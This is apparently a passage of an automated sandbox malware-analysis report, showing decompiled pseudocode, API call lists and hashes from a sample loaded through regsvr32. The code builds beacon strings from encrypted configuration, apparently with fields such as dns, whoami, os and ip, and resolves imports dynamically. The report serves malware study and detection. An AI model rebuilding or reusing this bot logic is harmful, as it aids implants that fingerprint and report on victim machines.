                                                                                                                                                                                                                                    					if(_t85 == 0) {
                                                                                                                                                                                                                                    						_t37 = 0;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t55 =  *0x23ed278; // 0x63699bc3
                                                                                                                                                                                                                                    						_t37 = E023E3F7C(_t86, _t85, _t55 ^ 0xb30fc035);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t37 != 0 && E023E6ED2(0, _t37) != 0) {
                                                                                                                                                                                                                                    						_t102 =  *0x23ed32c; // 0x4cc95b0
                                                                                                                                                                                                                                    						E023E75E9(_t102 + 4, _t53);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t85 == 0) {
                                                                                                                                                                                                                                    						_t38 = 0;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t50 =  *0x23ed278; // 0x63699bc3
                                                                                                                                                                                                                                    						_t38 = E023E3F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t38 == 0) {
                                                                                                                                                                                                                                    						L51:
                                                                                                                                                                                                                                    						_t39 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    						_t18 = _t39 + 0x23ee252; // 0x616d692f
                                                                                                                                                                                                                                    						 *0x23ed2d0 = _t18;
                                                                                                                                                                                                                                    						goto L52;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t49 = E023E6ED2(0, _t38);
                                                                                                                                                                                                                                    						 *0x23ed2d0 = _t49;
                                                                                                                                                                                                                                    						if(_t49 != 0) {
                                                                                                                                                                                                                                    							L52:
                                                                                                                                                                                                                                    							if(_t85 == 0) {
                                                                                                                                                                                                                                    								_t41 = 0;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t46 =  *0x23ed278; // 0x63699bc3
                                                                                                                                                                                                                                    								_t41 = E023E3F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							if(_t41 == 0) {
                                                                                                                                                                                                                                    								_t42 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    								_t19 = _t42 + 0x23ee791; // 0x6976612e
                                                                                                                                                                                                                                    								_t43 = _t19;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t43 = E023E6ED2(0, _t41);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							 *0x23ed340 = _t43;
                                                                                                                                                                                                                                    							HeapFree( *0x23ed238, 0, _t85);
                                                                                                                                                                                                                                    							L60:
                                                                                                                                                                                                                                    							return 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L51;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}



































                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,023E23DE,?,63699BC3,023E23DE,?,63699BC3,00000005,023ED00C,00000008,?,023E23DE), ref: 023E4119
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,023E23DE,?,63699BC3,023E23DE,?,63699BC3,00000005,023ED00C,00000008,?,023E23DE), ref: 023E414B
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,023E23DE,?,63699BC3,023E23DE,?,63699BC3,00000005,023ED00C,00000008,?,023E23DE), ref: 023E417D
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,023E23DE,?,63699BC3,023E23DE,?,63699BC3,00000005,023ED00C,00000008,?,023E23DE), ref: 023E41AF
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,023E23DE,?,63699BC3,023E23DE,?,63699BC3,00000005,023ED00C,00000008,?,023E23DE), ref: 023E41E1
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,023E23DE,023E23DE,?,63699BC3,023E23DE,?,63699BC3,00000005,023ED00C,00000008,?,023E23DE), ref: 023E42D8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                    • Opcode ID: 9524d8eca29e1b8d6b9e5377bbc1bd5688b708e4eecd1f080ea1f6ffe6836481
                                                                                                                                                                                                                                    • Instruction ID: 33a4e0a23495c67bc432b0f0e6f870dbf9dedc9e8a64dc61ec7a468f6814ffca
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9524d8eca29e1b8d6b9e5377bbc1bd5688b708e4eecd1f080ea1f6ffe6836481
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 306141F0A20228EADF30EAB4DD8496B76ED9B5C704B244D25E603EB2C5E731D95D8B11
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 66%
                                                                                                                                                                                                                                    			E023EA279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                                                                                                                                    				intOrPtr _v0;
                                                                                                                                                                                                                                    				intOrPtr _v4;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                                                                                    				intOrPtr _t28;
                                                                                                                                                                                                                                    				intOrPtr _t29;
                                                                                                                                                                                                                                    				intOrPtr _t30;
                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                    				intOrPtr _t54;
                                                                                                                                                                                                                                    				intOrPtr* _t56;
                                                                                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                    				intOrPtr _t71;
                                                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                                                    				int _t77;
                                                                                                                                                                                                                                    				intOrPtr _t78;
                                                                                                                                                                                                                                    				int _t81;
                                                                                                                                                                                                                                    				intOrPtr _t83;
                                                                                                                                                                                                                                    				int _t86;
                                                                                                                                                                                                                                    				intOrPtr* _t89;
                                                                                                                                                                                                                                    				intOrPtr* _t90;
                                                                                                                                                                                                                                    				void* _t91;
                                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                                                    				intOrPtr _t98;
                                                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                                                    				int _t101;
                                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                                                    				void* _t105;
                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                    				void* _t108;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t95 = __edx;
                                                                                                                                                                                                                                    				_t91 = __ecx;
                                                                                                                                                                                                                                    				_t25 = __eax;
                                                                                                                                                                                                                                    				_t105 = _a16;
                                                                                                                                                                                                                                    				_v4 = 8;
                                                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                                                    					_t25 = GetTickCount();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t26 =  *0x23ed018; // 0x99d5691b
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t27 =  *0x23ed014; // 0x3a87c8cd
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t28 =  *0x23ed010; // 0xd8d2f808
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t29 =  *0x23ed00c; // 0x62819102
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t30 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    				_t3 = _t30 + 0x23ee633; // 0x74666f73
                                                                                                                                                                                                                                    				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0x23ed02c,  *0x23ed004, _t25);
                                                                                                                                                                                                                                    				_t33 = E023E1C1A();
                                                                                                                                                                                                                                    				_t34 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    				_t4 = _t34 + 0x23ee673; // 0x74707526
                                                                                                                                                                                                                                    				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                                                                                                                                                                                                    				_t108 = _t106 + 0x38;
                                                                                                                                                                                                                                    				_t102 = _t101 + _t37;
                                                                                                                                                                                                                                    				_t96 = E023E54BC(_t91);
                                                                                                                                                                                                                                    				if(_t96 != 0) {
                                                                                                                                                                                                                                    					_t83 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    					_t6 = _t83 + 0x23ee8eb; // 0x736e6426
                                                                                                                                                                                                                                    					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                                                                                                                                                                                                    					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                    					_t102 = _t102 + _t86;
                                                                                                                                                                                                                                    					HeapFree( *0x23ed238, 0, _t96);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t97 = E023E7649();
                                                                                                                                                                                                                                    				if(_t97 != 0) {
                                                                                                                                                                                                                                    					_t78 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    					_t8 = _t78 + 0x23ee8f3; // 0x6f687726
                                                                                                                                                                                                                                    					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                                                                                                                                                                                                    					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                    					_t102 = _t102 + _t81;
                                                                                                                                                                                                                                    					HeapFree( *0x23ed238, 0, _t97);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t98 =  *0x23ed32c; // 0x4cc95b0
                                                                                                                                                                                                                                    				_a32 = E023E9395(0x23ed00a, _t98 + 4);
                                                                                                                                                                                                                                    				_t42 =  *0x23ed2cc; // 0x0
                                                                                                                                                                                                                                    				if(_t42 != 0) {
                                                                                                                                                                                                                                    					_t74 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    					_t11 = _t74 + 0x23ee8cd; // 0x3d736f26
                                                                                                                                                                                                                                    					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                                                                                                                                                                                                    					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                    					_t102 = _t102 + _t77;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t43 =  *0x23ed2c8; // 0x0
                                                                                                                                                                                                                                    				if(_t43 != 0) {
                                                                                                                                                                                                                                    					_t71 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    					_t13 = _t71 + 0x23ee8c6; // 0x3d706926
                                                                                                                                                                                                                                    					wsprintfA(_t102 + _t105, _t13, _t43);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_a32 != 0) {
                                                                                                                                                                                                                                    					_t100 = RtlAllocateHeap( *0x23ed238, 0, 0x800);
                                                                                                                                                                                                                                    					if(_t100 != 0) {
                                                                                                                                                                                                                                    						E023E7A80(GetTickCount());
                                                                                                                                                                                                                                    						_t50 =  *0x23ed32c; // 0x4cc95b0
                                                                                                                                                                                                                                    						__imp__(_t50 + 0x40);
                                                                                                                                                                                                                                    						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                    						_t54 =  *0x23ed32c; // 0x4cc95b0
                                                                                                                                                                                                                                    						__imp__(_t54 + 0x40);
                                                                                                                                                                                                                                    						_t56 =  *0x23ed32c; // 0x4cc95b0
                                                                                                                                                                                                                                    						_t103 = E023E8307(1, _t95, _t105,  *_t56);
                                                                                                                                                                                                                                    						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                    						if(_t103 != 0) {
                                                                                                                                                                                                                                    							StrTrimA(_t103, 0x23ec2ac);
                                                                                                                                                                                                                                    							_push(_t103);
                                                                                                                                                                                                                                    							_t62 = E023E3CC8();
                                                                                                                                                                                                                                    							_v16 = _t62;
                                                                                                                                                                                                                                    							if(_t62 != 0) {
                                                                                                                                                                                                                                    								_t89 = __imp__;
                                                                                                                                                                                                                                    								 *_t89(_t103, _v0);
                                                                                                                                                                                                                                    								 *_t89(_t100, _a4);
                                                                                                                                                                                                                                    								_t90 = __imp__;
                                                                                                                                                                                                                                    								 *_t90(_t100, _v28);
                                                                                                                                                                                                                                    								 *_t90(_t100, _t103);
                                                                                                                                                                                                                                    								_t68 = E023E1199(0xffffffffffffffff, _t100, _v28, _v24);
                                                                                                                                                                                                                                    								_v52 = _t68;
                                                                                                                                                                                                                                    								if(_t68 != 0 && _t68 != 0x10d2) {
                                                                                                                                                                                                                                    									E023EA1B0();
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								HeapFree( *0x23ed238, 0, _v44);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							HeapFree( *0x23ed238, 0, _t103);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						HeapFree( *0x23ed238, 0, _t100);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					HeapFree( *0x23ed238, 0, _a24);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				HeapFree( *0x23ed238, 0, _t105);
                                                                                                                                                                                                                                    				return _a12;
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    0x023ea47a
                                                                                                                                                                                                                                    0x023ea47e
                                                                                                                                                                                                                                    0x023ea489
                                                                                                                                                                                                                                    0x023ea490
                                                                                                                                                                                                                                    0x023ea494
                                                                                                                                                                                                                                    0x023ea49d
                                                                                                                                                                                                                                    0x023ea49d
                                                                                                                                                                                                                                    0x023ea4ae
                                                                                                                                                                                                                                    0x023ea4ae
                                                                                                                                                                                                                                    0x023ea4bd
                                                                                                                                                                                                                                    0x023ea4bd
                                                                                                                                                                                                                                    0x023ea4cc
                                                                                                                                                                                                                                    0x023ea4cc
                                                                                                                                                                                                                                    0x023ea4de
                                                                                                                                                                                                                                    0x023ea4de
                                                                                                                                                                                                                                    0x023ea4ed
                                                                                                                                                                                                                                    0x023ea4fe

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 023EA290
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023EA2DD
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023EA2FA
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023EA31D
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 023EA32D
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023EA34F
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 023EA35F
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023EA396
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023EA3B6
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 023EA3D3
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 023EA3E3
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(04CC9570), ref: 023EA3F7
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(04CC9570), ref: 023EA415
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,023EA428,?,04CC95B0), ref: 023E8332
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: lstrlen.KERNEL32(?,?,?,023EA428,?,04CC95B0), ref: 023E833A
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: strcpy.NTDLL ref: 023E8351
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: lstrcat.KERNEL32(00000000,?), ref: 023E835C
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,023EA428,?,04CC95B0), ref: 023E8379
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,023EC2AC,?,04CC95B0), ref: 023EA447
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrlen.KERNEL32(04CC87FA,00000000,00000000,73FCC740,023EA453,00000000), ref: 023E3CD8
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrlen.KERNEL32(?), ref: 023E3CE0
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrcpy.KERNEL32(00000000,04CC87FA), ref: 023E3CF4
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrcat.KERNEL32(00000000,?), ref: 023E3CFF
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 023EA466
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 023EA46D
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 023EA47A
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 023EA47E
                                                                                                                                                                                                                                      • Part of subcall function 023E1199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,76D681D0), ref: 023E124B
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 023EA4AE
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 023EA4BD
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,04CC95B0), ref: 023EA4CC
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 023EA4DE
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 023EA4ED
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3080378247-0
                                                                                                                                                                                                                                    • Opcode ID: 69286a1d5df9a390a3aff977d82c54cd787fe296aa8774d169af910e5aced74b
                                                                                                                                                                                                                                    • Instruction ID: 4592b68a48222493167e1e559cec45c784c6f9be8c4c6ca0dc70383a95153d5e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69286a1d5df9a390a3aff977d82c54cd787fe296aa8774d169af910e5aced74b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 996197B1980218EFCF319B64EC48F5A77ECEB48714F050815F90ADA2D0DB36E92D9B61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                                                    			E023EADE5(long _a4, long _a8) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				LONG* _v28;
                                                                                                                                                                                                                                    				long _v40;
                                                                                                                                                                                                                                    				long _v44;
                                                                                                                                                                                                                                    				long _v48;
                                                                                                                                                                                                                                    				CHAR* _v52;
                                                                                                                                                                                                                                    				long _v56;
                                                                                                                                                                                                                                    				CHAR* _v60;
                                                                                                                                                                                                                                    				long _v64;
                                                                                                                                                                                                                                    				signed int* _v68;
                                                                                                                                                                                                                                    				char _v72;
                                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                                                    				intOrPtr* _t82;
                                                                                                                                                                                                                                    				intOrPtr* _t83;
                                                                                                                                                                                                                                    				intOrPtr* _t85;
                                                                                                                                                                                                                                    				intOrPtr* _t90;
                                                                                                                                                                                                                                    				intOrPtr* _t95;
                                                                                                                                                                                                                                    				intOrPtr* _t98;
                                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                                    				intOrPtr* _t104;
                                                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                                                    				long _t116;
                                                                                                                                                                                                                                    				void _t125;
                                                                                                                                                                                                                                    				void* _t131;
                                                                                                                                                                                                                                    				signed short _t133;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t138;
                                                                                                                                                                                                                                    				signed int* _t139;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t139 = _a4;
                                                                                                                                                                                                                                    				_v28 = _t139[2] + 0x23e0000;
                                                                                                                                                                                                                                    				_t115 = _t139[3] + 0x23e0000;
                                                                                                                                                                                                                                    				_t131 = _t139[4] + 0x23e0000;
                                                                                                                                                                                                                                    				_v8 = _t139[7];
                                                                                                                                                                                                                                    				_v60 = _t139[1] + 0x23e0000;
                                                                                                                                                                                                                                    				_v16 = _t139[5] + 0x23e0000;
                                                                                                                                                                                                                                    				_v64 = _a8;
                                                                                                                                                                                                                                    				_v72 = 0x24;
                                                                                                                                                                                                                                    				_v68 = _t139;
                                                                                                                                                                                                                                    				_v56 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_v48 = 0;
                                                                                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                    				if(( *_t139 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    					_a8 =  &_v72;
                                                                                                                                                                                                                                    					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t138 =  *_v28;
                                                                                                                                                                                                                                    				_t76 = _a8 - _t115 >> 2 << 2;
                                                                                                                                                                                                                                    				_t133 =  *(_t131 + _t76);
                                                                                                                                                                                                                                    				_a4 = _t76;
                                                                                                                                                                                                                                    				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                                                                                                                                                                                                    				_v56 = _t80;
                                                                                                                                                                                                                                    				_t81 = _t133 + 0x23e0002;
                                                                                                                                                                                                                                    				if(_t80 == 0) {
                                                                                                                                                                                                                                    					_t81 = _t133 & 0x0000ffff;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_v52 = _t81;
                                                                                                                                                                                                                                    				_t82 =  *0x23ed1a0; // 0x0
                                                                                                                                                                                                                                    				_t116 = 0;
                                                                                                                                                                                                                                    				if(_t82 == 0) {
                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                    					if(_t138 != 0) {
                                                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                                                    						_t83 =  *0x23ed1a0; // 0x0
                                                                                                                                                                                                                                    						_v48 = _t138;
                                                                                                                                                                                                                                    						if(_t83 != 0) {
                                                                                                                                                                                                                                    							_t116 =  *_t83(2,  &_v72);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t116 != 0) {
                                                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                                                    							 *_a8 = _t116;
                                                                                                                                                                                                                                    							L33:
                                                                                                                                                                                                                                    							_t85 =  *0x23ed1a0; // 0x0
                                                                                                                                                                                                                                    							if(_t85 != 0) {
                                                                                                                                                                                                                                    								_v40 = _v40 & 0x00000000;
                                                                                                                                                                                                                                    								_v48 = _t138;
                                                                                                                                                                                                                                    								_v44 = _t116;
                                                                                                                                                                                                                                    								 *_t85(5,  &_v72);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							return _t116;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                                                    								_t116 = GetProcAddress(_t138, _v52);
                                                                                                                                                                                                                                    								if(_t116 == 0) {
                                                                                                                                                                                                                                    									_v40 = GetLastError();
                                                                                                                                                                                                                                    									_t90 =  *0x23ed19c; // 0x0
                                                                                                                                                                                                                                    									if(_t90 != 0) {
                                                                                                                                                                                                                                    										_t116 =  *_t90(4,  &_v72);
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									if(_t116 == 0) {
                                                                                                                                                                                                                                    										_a4 =  &_v72;
                                                                                                                                                                                                                                    										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                                                                                                                                                                                                    										_t116 = _v44;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                                                                                                                                                                                                    								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                                                                                                                                                                                                    									_t116 =  *(_a4 + _v16);
                                                                                                                                                                                                                                    									if(_t116 != 0) {
                                                                                                                                                                                                                                    										goto L32;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L27;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t98 =  *0x23ed1a0; // 0x0
                                                                                                                                                                                                                                    					if(_t98 == 0) {
                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                    						_t138 = LoadLibraryA(_v60);
                                                                                                                                                                                                                                    						if(_t138 != 0) {
                                                                                                                                                                                                                                    							L13:
                                                                                                                                                                                                                                    							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                                                                                                                                                                                                    								FreeLibrary(_t138);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								if(_t139[6] != 0) {
                                                                                                                                                                                                                                    									_t102 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                    									if(_t102 != 0) {
                                                                                                                                                                                                                                    										 *(_t102 + 4) = _t139;
                                                                                                                                                                                                                                    										_t125 =  *0x23ed198; // 0x0
                                                                                                                                                                                                                                    										 *_t102 = _t125;
                                                                                                                                                                                                                                    										 *0x23ed198 = _t102;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_v40 = GetLastError();
                                                                                                                                                                                                                                    						_t104 =  *0x23ed19c; // 0x0
                                                                                                                                                                                                                                    						if(_t104 == 0) {
                                                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                                                    							_a8 =  &_v72;
                                                                                                                                                                                                                                    							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                                                                                                                                                                                                    							return _v44;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t138 =  *_t104(3,  &_v72);
                                                                                                                                                                                                                                    						if(_t138 != 0) {
                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t138 =  *_t98(1,  &_v72);
                                                                                                                                                                                                                                    					if(_t138 != 0) {
                                                                                                                                                                                                                                    						goto L13;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t116 =  *_t82(0,  &_v72);
                                                                                                                                                                                                                                    				if(_t116 != 0) {
                                                                                                                                                                                                                                    					goto L33;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L6;
                                                                                                                                                                                                                                    			}


































